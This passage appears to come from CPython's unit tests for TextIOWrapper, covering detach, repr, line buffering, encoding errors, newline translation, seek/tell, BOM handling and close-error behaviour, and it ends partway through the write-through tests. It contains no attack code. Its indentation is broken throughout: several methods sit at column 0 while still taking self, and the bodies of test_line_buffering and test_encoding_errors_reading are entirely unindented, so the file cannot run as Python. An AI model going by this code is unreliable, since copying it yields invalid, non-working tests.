        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        del t
        t = self.TextIOWrapper.__new__(self.TextIOWrapper)
        self.assertRaises(Exception, repr, t)
        self.assertRaisesRegex((ValueError, AttributeError),
                               'uninitialized|has no attribute',
                               t.read, 0)
        t.__init__(self.MockRawIO())
        self.assertEqual(t.read(0), '')
    def test_non_text_encoding_codecs_are_rejected(self):
        # Ensure the constructor complains if passed a codec that isn't
        # marked as a text encoding
        # http://bugs.python.org/issue20404
        r = self.BytesIO()
        b = self.BufferedWriter(r)
        with self.assertRaisesRegex(LookupError, "is not a text encoding"):
            self.TextIOWrapper(b, encoding="hex")
    def test_detach(self):
        # detach() returns the underlying buffer, flushes pending text,
        # and leaves the wrapper usable only for stream-independent ops.
        r = self.BytesIO()
        b = self.BufferedWriter(r)
        t = self.TextIOWrapper(b)
        self.assertIs(t.detach(), b)

        t = self.TextIOWrapper(b, encoding="ascii")
        t.write("howdy")
        self.assertFalse(r.getvalue())
        t.detach()
        self.assertEqual(r.getvalue(), b"howdy")
        self.assertRaises(ValueError, t.detach)

        # Operations independent of the detached stream should still work
        repr(t)
        self.assertEqual(t.encoding, "ascii")
        self.assertEqual(t.errors, "strict")
        self.assertFalse(t.line_buffering)
        self.assertFalse(t.write_through)
    def test_repr(self):
        # repr() includes name and mode only when available on the raw
        # stream / wrapper, and works whether name is str or bytes.
        raw = self.BytesIO("hello".encode("utf-8"))
        b = self.BufferedReader(raw)
        t = self.TextIOWrapper(b, encoding="utf-8")
        modname = self.TextIOWrapper.__module__
        self.assertRegex(repr(t),
                         r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
        raw.name = "dummy"
        self.assertRegex(repr(t),
                         r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
        t.mode = "r"
        self.assertRegex(repr(t),
                         r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
        raw.name = b"dummy"
        self.assertRegex(repr(t),
                         r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)

        t.buffer.detach()
        repr(t)  # Should not raise an exception
    def test_recursive_repr(self):
        # Issue #25455
        # A raw stream whose name is the wrapper itself must not cause
        # infinite recursion in repr().
        raw = self.BytesIO()
        t = self.TextIOWrapper(raw)
        with support.swap_attr(raw, 'name', t):
            try:
                repr(t)  # Should not crash
            except RuntimeError:
                pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
    def test_reconfigure_line_buffering(self):
        # reconfigure() can toggle line buffering at runtime; each toggle
        # performs an implicit flush.
        r = self.BytesIO()
        b = self.BufferedWriter(r, 1000)
        t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
        t.write("AB\nC")
        self.assertEqual(r.getvalue(), b"")

        t.reconfigure(line_buffering=True)   # implicit flush
        self.assertEqual(r.getvalue(), b"AB\nC")
        t.write("DEF\nG")
        self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
        t.write("H")
        self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
        t.reconfigure(line_buffering=False)   # implicit flush
        self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
        t.write("IJ")
        self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")

        # Keeping default value
        t.reconfigure()
        t.reconfigure(line_buffering=None)
        self.assertEqual(t.line_buffering, False)
        t.reconfigure(line_buffering=True)
        t.reconfigure()
        t.reconfigure(line_buffering=None)
        self.assertEqual(t.line_buffering, True)
    @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
    def test_default_encoding(self):
        old_environ = dict(os.environ)
        try:
            # try to get a user preferred encoding different than the current
            # locale encoding to check that TextIOWrapper() uses the current
            # locale encoding and not the user preferred encoding
            for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
                if key in os.environ:
                    del os.environ[key]

            current_locale_encoding = locale.getpreferredencoding(False)
            b = self.BytesIO()
            t = self.TextIOWrapper(b)
            self.assertEqual(t.encoding, current_locale_encoding)
        finally:
            # Restore the environment exactly as it was.
            os.environ.clear()
            os.environ.update(old_environ)
    @support.cpython_only
    @unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
    def test_device_encoding(self):
        # Issue 15989
        # File descriptors beyond the C int/unsigned int range must raise
        # OverflowError rather than being truncated.
        import _testcapi
        b = self.BytesIO()
        b.fileno = lambda: _testcapi.INT_MAX + 1
        self.assertRaises(OverflowError, self.TextIOWrapper, b)
        b.fileno = lambda: _testcapi.UINT_MAX + 1
        self.assertRaises(OverflowError, self.TextIOWrapper, b)
    def test_encoding(self):
        # Check the encoding attribute is always set, and valid
        b = self.BytesIO()
        t = self.TextIOWrapper(b, encoding="utf-8")
        self.assertEqual(t.encoding, "utf-8")
        t = self.TextIOWrapper(b)
        self.assertIsNotNone(t.encoding)
        # The default encoding must be resolvable through codecs.
        codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
    """Writing unencodable text honors the errors= policy:
    default/strict raise, ignore drops the char, replace writes '?'."""
    # (1) default
    b = self.BytesIO()
    t = self.TextIOWrapper(b, encoding="ascii")
    self.assertRaises(UnicodeError, t.write, "\xff")
    # (2) explicit strict
    b = self.BytesIO()
    t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
    self.assertRaises(UnicodeError, t.write, "\xff")
    # (3) ignore
    b = self.BytesIO()
    t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
                           newline="\n")
    t.write("abc\xffdef\n")
    t.flush()
    self.assertEqual(b.getvalue(), b"abcdef\n")
    # (4) replace
    b = self.BytesIO()
    t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
                           newline="\n")
    t.write("abc\xffdef\n")
    t.flush()
    self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
    """Exercise universal-newline decoding for each newline= mode across
    several encodings, buffer sizes, and read styles (read(2)+readline
    vs. line iteration)."""
    input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
    # Each entry: (newline argument, expected decoded lines).
    tests = [
        [ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
        [ '', input_lines ],
        [ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
        [ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
        [ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
    ]
    encodings = (
        'utf-8', 'latin-1',
        'utf-16', 'utf-16-le', 'utf-16-be',
        'utf-32', 'utf-32-le', 'utf-32-be',
    )
    # Try a range of buffer sizes to test the case where \r is the last
    # character in TextIOWrapper._pending_line.
    for encoding in encodings:
        # XXX: str.encode() should return bytes
        data = bytes(''.join(input_lines).encode(encoding))
        for do_reads in (False, True):
            for bufsize in range(1, 10):
                for newline, exp_lines in tests:
                    bufio = self.BufferedReader(self.BytesIO(data), bufsize)
                    textio = self.TextIOWrapper(bufio, newline=newline,
                                                encoding=encoding)
                    if do_reads:
                        # Interleave small read()s with readline().
                        got_lines = []
                        while True:
                            c2 = textio.read(2)
                            if c2 == '':
                                break
                            self.assertEqual(len(c2), 2)
                            got_lines.append(c2 + textio.readline())
                    else:
                        got_lines = list(textio)
                    for got_line, exp_line in zip(got_lines, exp_lines):
                        self.assertEqual(got_line, exp_line)
                    self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
    """Check readlines()/read() line splitting for every newline= mode,
    including data containing an embedded NUL byte."""
    testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
    normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    for newline, expected in [
        (None, normalized.decode("ascii").splitlines(keepends=True)),
        ("", testdata.decode("ascii").splitlines(keepends=True)),
        ("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
        ("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
        ("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
        ]:
        buf = self.BytesIO(testdata)
        txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
        self.assertEqual(txt.readlines(), expected)
        txt.seek(0)
        # read() after seek(0) must reproduce the same content.
        self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
    """Check newline translation on write for each newline= mode;
    newline=None translates '\\n' to os.linesep."""
    testdict = {
        "": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
        "\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
        "\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
        "\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
        }
    tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
    for newline, expected in tests:
        buf = self.BytesIO()
        txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
        # Write across call boundaries to exercise buffering of partial lines.
        txt.write("AAA\nB")
        txt.write("BB\nCCC\n")
        txt.write("X\rY\r\nZ")
        txt.flush()
        self.assertEqual(buf.closed, False)
        self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
    """Deleting a TextIOWrapper must flush pending text and close the
    underlying buffer."""
    l = []
    base = self.BytesIO
    class MyBytesIO(base):
        def close(self):
            # Record the buffer contents at close time.
            l.append(self.getvalue())
            base.close(self)
    b = MyBytesIO()
    t = self.TextIOWrapper(b, encoding="ascii")
    t.write("abc")
    del t
    support.gc_collect()
    # close() saw the flushed data, proving flush happened before close.
    self.assertEqual([b"abc"], l)
def test_override_destructor(self):
    """An overridden __del__ must run first, and finalization must still
    call the subclass's close() which in turn flushes (order: 1, 2, 3)."""
    record = []
    class MyTextIO(self.TextIOWrapper):
        def __del__(self):
            record.append(1)
            try:
                # The base class may or may not define __del__.
                f = super().__del__
            except AttributeError:
                pass
            else:
                f()
        def close(self):
            record.append(2)
            super().close()
        def flush(self):
            record.append(3)
            super().flush()
    b = self.BytesIO()
    t = MyTextIO(b, encoding="ascii")
    del t
    support.gc_collect()
    self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
    # Test that the exception state is not modified by a destructor,
    # even if close() fails.
    rawio = self.CloseFailureIO()
    with support.catch_unraisable_exception() as cm:
        with self.assertRaises(AttributeError):
            # Accessing a missing attribute triggers finalization of the
            # temporary wrapper, whose close() raises.
            self.TextIOWrapper(rawio).xyzzy
        if not IOBASE_EMITS_UNRAISABLE:
            self.assertIsNone(cm.unraisable)
        elif cm.unraisable is not None:
            self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
    """Systematic read/write/seek/tell checks over many chunk sizes and
    encodings on a real file (support.TESTFN)."""
    for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
        for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
            f = self.open(support.TESTFN, "w+", encoding=enc)
            f._CHUNK_SIZE = chunksize
            self.assertEqual(f.write("abc"), 3)
            f.close()
            f = self.open(support.TESTFN, "r+", encoding=enc)
            f._CHUNK_SIZE = chunksize
            self.assertEqual(f.tell(), 0)
            self.assertEqual(f.read(), "abc")
            cookie = f.tell()
            self.assertEqual(f.seek(0), 0)
            self.assertEqual(f.read(None), "abc")
            f.seek(0)
            self.assertEqual(f.read(2), "ab")
            self.assertEqual(f.read(1), "c")
            self.assertEqual(f.read(1), "")
            self.assertEqual(f.read(), "")
            self.assertEqual(f.tell(), cookie)
            self.assertEqual(f.seek(0), 0)
            self.assertEqual(f.seek(0, 2), cookie)
            self.assertEqual(f.write("def"), 3)
            self.assertEqual(f.seek(cookie), cookie)
            self.assertEqual(f.read(), "def")
            if enc.startswith("utf"):
                # Multibyte encodings get the extra multi-line round-trip.
                self.multi_line_test(f, enc)
            f.close()
def multi_line_test(self, f, enc):
    """Helper for test_basic_io: write lines of many sizes built from a
    multibyte sample, then verify readline() reproduces each line at the
    tell() position recorded at write time."""
    f.seek(0)
    f.truncate()
    sample = "s\xff\u0fff\uffff"
    wlines = []
    for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
        chars = []
        for i in range(size):
            chars.append(sample[i % len(sample)])
        line = "".join(chars) + "\n"
        # Remember (position, line) pairs for later comparison.
        wlines.append((f.tell(), line))
        f.write(line)
    f.seek(0)
    rlines = []
    while True:
        pos = f.tell()
        line = f.readline()
        if not line:
            break
        rlines.append((pos, line))
    self.assertEqual(rlines, wlines)
def test_telling(self):
    """tell() must return consistent cookies around writes and readline(),
    and must raise OSError in the middle of line iteration."""
    f = self.open(support.TESTFN, "w+", encoding="utf-8")
    p0 = f.tell()
    f.write("\xff\n")
    p1 = f.tell()
    f.write("\xff\n")
    p2 = f.tell()
    f.seek(0)
    self.assertEqual(f.tell(), p0)
    self.assertEqual(f.readline(), "\xff\n")
    self.assertEqual(f.tell(), p1)
    self.assertEqual(f.readline(), "\xff\n")
    self.assertEqual(f.tell(), p2)
    f.seek(0)
    for line in f:
        self.assertEqual(line, "\xff\n")
        # tell() is not allowed while the read-ahead iterator is active.
        self.assertRaises(OSError, f.tell)
    self.assertEqual(f.tell(), p2)
    f.close()
def test_seeking(self):
    """Read a prefix that nearly fills a decoding chunk, then check tell()
    and readline() when a multibyte char straddles the chunk boundary."""
    chunk_size = _default_chunk_size()
    prefix_size = chunk_size - 2
    u_prefix = "a" * prefix_size
    prefix = bytes(u_prefix.encode("utf-8"))
    # ASCII prefix: one byte per char, so lengths match.
    self.assertEqual(len(u_prefix), len(prefix))
    u_suffix = "\u8888\n"
    suffix = bytes(u_suffix.encode("utf-8"))
    line = prefix + suffix
    with self.open(support.TESTFN, "wb") as f:
        f.write(line*2)
    with self.open(support.TESTFN, "r", encoding="utf-8") as f:
        s = f.read(prefix_size)
        self.assertEqual(s, str(prefix, "ascii"))
        self.assertEqual(f.tell(), prefix_size)
        self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
    # Regression test for a specific bug
    data = b'\xe0\xbf\xbf\n'
    with self.open(support.TESTFN, "wb") as f:
        f.write(data)
    with self.open(support.TESTFN, "r", encoding="utf-8") as f:
        f._CHUNK_SIZE # Just test that it exists
        # Force a chunk size smaller than the 3-byte UTF-8 sequence.
        f._CHUNK_SIZE = 2
        f.readline()
        f.tell()
def test_seek_and_tell(self):
    #Test seek/tell using the StatefulIncrementalDecoder.
    # Make test faster by doing smaller seeks
    CHUNK_SIZE = 128
    def test_seek_and_tell_with_data(data, min_pos=0):
        """Tell/seek to various points within a data stream and ensure
        that the decoded data returned by read() is consistent."""
        f = self.open(support.TESTFN, 'wb')
        f.write(data)
        f.close()
        f = self.open(support.TESTFN, encoding='test_decoder')
        f._CHUNK_SIZE = CHUNK_SIZE
        decoded = f.read()
        f.close()
        for i in range(min_pos, len(decoded) + 1): # seek positions
            for j in [1, 5, len(decoded) - i]: # read lengths
                f = self.open(support.TESTFN, encoding='test_decoder')
                self.assertEqual(f.read(i), decoded[:i])
                cookie = f.tell()
                self.assertEqual(f.read(j), decoded[i:i + j])
                # Seeking back to the cookie must restore decoder state.
                f.seek(cookie)
                self.assertEqual(f.read(), decoded[i:])
                f.close()
    # Enable the test decoder.
    StatefulIncrementalDecoder.codecEnabled = 1
    # Run the tests.
    try:
        # Try each test case.
        for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
            test_seek_and_tell_with_data(input)
        # Position each test case so that it crosses a chunk boundary.
        for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
            offset = CHUNK_SIZE - len(input)//2
            prefix = b'.'*offset
            # Don't bother seeking into the prefix (takes too long).
            min_pos = offset*2
            test_seek_and_tell_with_data(prefix + input, min_pos)
    # Ensure our test decoder won't interfere with subsequent tests.
    finally:
        StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
    """seek()/tell() round-trip across multibyte euc_jp data."""
    f = self.open(support.TESTFN, "w", encoding="euc_jp")
    f.write("AB\n\u3046\u3048\n")
    f.close()
    f = self.open(support.TESTFN, "r", encoding="euc_jp")
    self.assertEqual(f.readline(), "AB\n")
    p0 = f.tell()
    self.assertEqual(f.readline(), "\u3046\u3048\n")
    p1 = f.tell()
    f.seek(p0)
    # Re-reading from the cookie must yield the identical line.
    self.assertEqual(f.readline(), "\u3046\u3048\n")
    self.assertEqual(f.tell(), p1)
    f.close()
def test_seek_with_encoder_state(self):
    """Seeking back and writing must restore the stateful encoder's
    state (euc_jis_2004 combines base char + combining mark)."""
    f = self.open(support.TESTFN, "w", encoding="euc_jis_2004")
    f.write("\u00e6\u0300")
    p0 = f.tell()
    f.write("\u00e6")
    f.seek(p0)
    # Overwrite with a combining char; the encoder state at p0 matters.
    f.write("\u0300")
    f.close()
    f = self.open(support.TESTFN, "r", encoding="euc_jis_2004")
    self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
    f.close()
def test_encoded_writes(self):
    """For BOM-emitting encodings, multiple writes must produce exactly
    one BOM (issue1753)."""
    data = "1234567890"
    tests = ("utf-16",
             "utf-16-le",
             "utf-16-be",
             "utf-32",
             "utf-32-le",
             "utf-32-be")
    for encoding in tests:
        buf = self.BytesIO()
        f = self.TextIOWrapper(buf, encoding=encoding)
        # Check if the BOM is written only once (see issue1753).
        f.write(data)
        f.write(data)
        f.seek(0)
        self.assertEqual(f.read(), data * 2)
        f.seek(0)
        self.assertEqual(f.read(), data * 2)
        # str.encode() emits the BOM once, matching the expected bytes.
        self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
    """read() on a wrapper over a non-readable buffer raises OSError."""
    class UnReadable(self.BytesIO):
        def readable(self):
            return False
    txt = self.TextIOWrapper(UnReadable())
    self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
    """read(1) loops must still translate '\\r\\n' to '\\n'."""
    txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
    reads = ""
    while True:
        c = txt.read(1)
        if not c:
            break
        reads += c
    self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
    """readlines() with no hint, hint=None, and a byte hint."""
    txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
    self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
    txt.seek(0)
    self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
    txt.seek(0)
    # hint=5 stops after the line that pushes the total past 5 chars.
    self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
    # make sure "\r\n" straddles 128 char boundary.
    txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
    reads = ""
    while True:
        c = txt.read(128)
        if not c:
            break
        reads += c
    # '\r\n' split across chunks must still collapse to '\n'.
    self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
    """writelines() concatenates items with no separator added."""
    l = ['ab', 'cd', 'ef']
    buf = self.BytesIO()
    txt = self.TextIOWrapper(buf)
    txt.writelines(l)
    txt.flush()
    self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
    """writelines() accepts arbitrary sequence types (UserList)."""
    l = UserList(['ab', 'cd', 'ef'])
    buf = self.BytesIO()
    txt = self.TextIOWrapper(buf)
    txt.writelines(l)
    txt.flush()
    self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
    """writelines() rejects non-str items, None, and bytes."""
    txt = self.TextIOWrapper(self.BytesIO())
    self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
    self.assertRaises(TypeError, txt.writelines, None)
    self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
    """Issue 1395: char-at-a-time reads reproduce the normalized data."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    # read one char at a time
    reads = ""
    while True:
        c = txt.read(1)
        if not c:
            break
        reads += c
    self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
    """Issue 1395: 4-char reads with a tiny chunk size."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt._CHUNK_SIZE = 4
    reads = ""
    while True:
        c = txt.read(4)
        if not c:
            break
        reads += c
    self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
    """Issue 1395: mixing read(4) and readline() with a tiny chunk size."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt._CHUNK_SIZE = 4
    reads = txt.read(4)
    reads += txt.read(4)
    reads += txt.readline()
    reads += txt.readline()
    reads += txt.readline()
    self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
    """Issue 1395: partial read followed by read-to-end."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt._CHUNK_SIZE = 4
    reads = txt.read(4)
    reads += txt.read()
    self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
    """Issue 1395: tell()/seek() round-trip mid-stream, then read."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt._CHUNK_SIZE = 4
    reads = txt.read(4)
    pos = txt.tell()
    txt.seek(0)
    txt.seek(pos)
    self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
    """Issue 2282: seekable() is delegated to the underlying buffer."""
    buffer = self.BytesIO(self.testdata)
    txt = self.TextIOWrapper(buffer, encoding="ascii")
    self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
    # The BOM is not written again when appending to a non-empty file
    filename = support.TESTFN
    for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
        with self.open(filename, 'w', encoding=charset) as f:
            f.write('aaa')
            pos = f.tell()
        with self.open(filename, 'rb') as f:
            self.assertEqual(f.read(), 'aaa'.encode(charset))
        with self.open(filename, 'a', encoding=charset) as f:
            f.write('xxx')
        with self.open(filename, 'rb') as f:
            # Only one BOM: the appended text must not add another.
            self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
    # Same test, but when seeking manually
    filename = support.TESTFN
    for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
        with self.open(filename, 'w', encoding=charset) as f:
            f.write('aaa')
            pos = f.tell()
        with self.open(filename, 'r+', encoding=charset) as f:
            f.seek(pos)
            f.write('zzz')
            # Seeking back to 0 overwrites past the BOM, not the BOM itself.
            f.seek(0)
            f.write('bbb')
        with self.open(filename, 'rb') as f:
            self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
    # Same test, but first seek to the start and then to the end
    filename = support.TESTFN
    for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
        with self.open(filename, 'w', encoding=charset) as f:
            f.write('aaa')
        with self.open(filename, 'a', encoding=charset) as f:
            # Seek to start then end before writing; no second BOM allowed.
            f.seek(0)
            f.seek(0, self.SEEK_END)
            f.write('xxx')
        with self.open(filename, 'rb') as f:
            self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
    """The errors attribute defaults to 'strict' and reflects errors=."""
    with self.open(support.TESTFN, "w") as f:
        self.assertEqual(f.errors, "strict")
    with self.open(support.TESTFN, "w", errors="replace") as f:
        self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
    # Issue6750: concurrent writes could duplicate data
    event = threading.Event()
    with self.open(support.TESTFN, "w", buffering=1) as f:
        def run(n):
            text = "Thread%03d\n" % n
            # Wait so all 20 threads write at (roughly) the same time.
            event.wait()
            f.write(text)
        threads = [threading.Thread(target=run, args=(x,))
                   for x in range(20)]
        with support.start_threads(threads, event.set):
            time.sleep(0.02)
    with self.open(support.TESTFN) as f:
        content = f.read()
        for n in range(20):
            # Each thread's line appears exactly once — no duplication.
            self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
    # Test that text file is closed despite failed flush
    # and that flush() is called before file closed.
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    closed = []
    def bad_flush():
        # Record whether the streams were already closed when flush ran.
        closed[:] = [txt.closed, txt.buffer.closed]
        raise OSError()
    txt.flush = bad_flush
    self.assertRaises(OSError, txt.close) # exception not swallowed
    self.assertTrue(txt.closed)
    self.assertTrue(txt.buffer.closed)
    self.assertTrue(closed)         # flush() called
    self.assertFalse(closed[0])     # flush() called before file closed
    self.assertFalse(closed[1])
    txt.flush = lambda: None        # break reference loop
def test_close_error_on_close(self):
    """If both flush() and buffer.close() fail, close() raises the close
    error with the flush error chained as __context__."""
    buffer = self.BytesIO(self.testdata)
    def bad_flush():
        raise OSError('flush')
    def bad_close():
        raise OSError('close')
    buffer.close = bad_close
    txt = self.TextIOWrapper(buffer, encoding="ascii")
    txt.flush = bad_flush
    with self.assertRaises(OSError) as err: # exception not swallowed
        txt.close()
    self.assertEqual(err.exception.args, ('close',))
    self.assertIsInstance(err.exception.__context__, OSError)
    self.assertEqual(err.exception.__context__.args, ('flush',))
    self.assertFalse(txt.closed)
    # Silence destructor error
    buffer.close = lambda: None
    txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
    # Issue #21677: same chaining behavior with non-normalized
    # exceptions (NameError raised by referencing undefined names).
    buffer = self.BytesIO(self.testdata)
    def bad_flush():
        raise non_existing_flush
    def bad_close():
        raise non_existing_close
    buffer.close = bad_close
    txt = self.TextIOWrapper(buffer, encoding="ascii")
    txt.flush = bad_flush
    with self.assertRaises(NameError) as err: # exception not swallowed
        txt.close()
    self.assertIn('non_existing_close', str(err.exception))
    self.assertIsInstance(err.exception.__context__, NameError)
    self.assertIn('non_existing_flush', str(err.exception.__context__))
    self.assertFalse(txt.closed)
    # Silence destructor error
    buffer.close = lambda: None
    txt.flush = lambda: None
def test_multi_close(self):
    """close() is idempotent, but flush() after close raises ValueError."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    txt.close()
    txt.close()
    txt.close()
    self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
    """tell()/seek() on an unseekable stream raise UnsupportedOperation."""
    txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
    self.assertRaises(self.UnsupportedOperation, txt.tell)
    self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
    """The buffer attribute is read-only."""
    txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
    buf = self.BytesIO(self.testdata)
    with self.assertRaises(AttributeError):
        txt.buffer = buf
def test_rawio(self):
    # Issue #12591: TextIOWrapper must work with raw I/O objects, so
    # that subprocess.Popen() can have the required unbuffered
    # semantics with universal_newlines=True.
    raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
    txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
    # Reads
    self.assertEqual(txt.read(4), 'abcd')
    self.assertEqual(txt.readline(), 'efghi\n')
    self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
    # Issue #12591: with write_through=True, writes don't need a flush
    raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
    txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
                             write_through=True)
    txt.write('1')
    txt.write('23\n4')
    txt.write('5')
    # All writes reached the raw stream without an explicit flush().
    self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
    # Issue #21396: write_through=True doesn't force a flush()
    # on the underlying binary buffered object.
    flush_called, write_called = [], []
    class BufferedWriter(self.BufferedWriter):
        def flush(self, *args, **kwargs):
            flush_called.append(True)
            return super().flush(*args, **kwargs)
        def write(self, *args, **kwargs):
            write_called.append(True)
            return super().write(*args, **kwargs)
    rawio = self.BytesIO()
    data = b"a"
    # Buffer twice as large as one write, so one write won't overflow it.
    bufio = BufferedWriter(rawio, len(data)*2)
    textio = self.TextIOWrapper(bufio, encoding='ascii',
                                write_through=True)
    # write to the buffered io but don't overflow the buffer
    text = data.decode('ascii')
    textio.write(text)
    # buffer.flush is not called with write_through=True
    self.assertFalse(flush_called)
    # buffer.write *is* called with write_through=True
    self.assertTrue(write_called)
    self.assertEqual(rawio.getvalue(), b"") # no flush
    write_called = [] # reset
    textio.write(text * 10) # total content is larger than bufio buffer
    self.assertTrue(write_called)
    self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
    """reconfigure(write_through=...) flushes pending data and toggles
    write-through; None/omitted keeps the current value."""
    raw = self.MockRawIO([])
    t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
    t.write('1')
    t.reconfigure(write_through=True)  # implied flush
    self.assertEqual(t.write_through, True)
